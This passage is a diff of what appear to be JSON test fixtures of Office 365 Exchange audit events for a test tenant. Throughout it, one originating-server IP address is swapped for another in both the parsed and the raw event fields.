bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1042,7 +1042,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1116,7 +1116,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1128,7 +1128,7 @@
 "Operation": "Set-TenantObjectVersion",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -1150,7 +1150,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1162,7 +1162,7 @@
 "Operation": "Set-TransportConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -1188,7 +1188,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1200,7 +1200,7 @@
 "Operation": "Set-TransportConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -1226,7 +1226,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1238,7 +1238,7 @@
 "Operation": "Set-TenantObjectVersion",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -1260,7 +1260,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1272,7 +1272,7 @@
 "Operation": "Set-TransportConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -1298,7 +1298,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1310,7 +1310,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1384,7 +1384,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -1396,7 +1396,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -1470,7 +1470,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 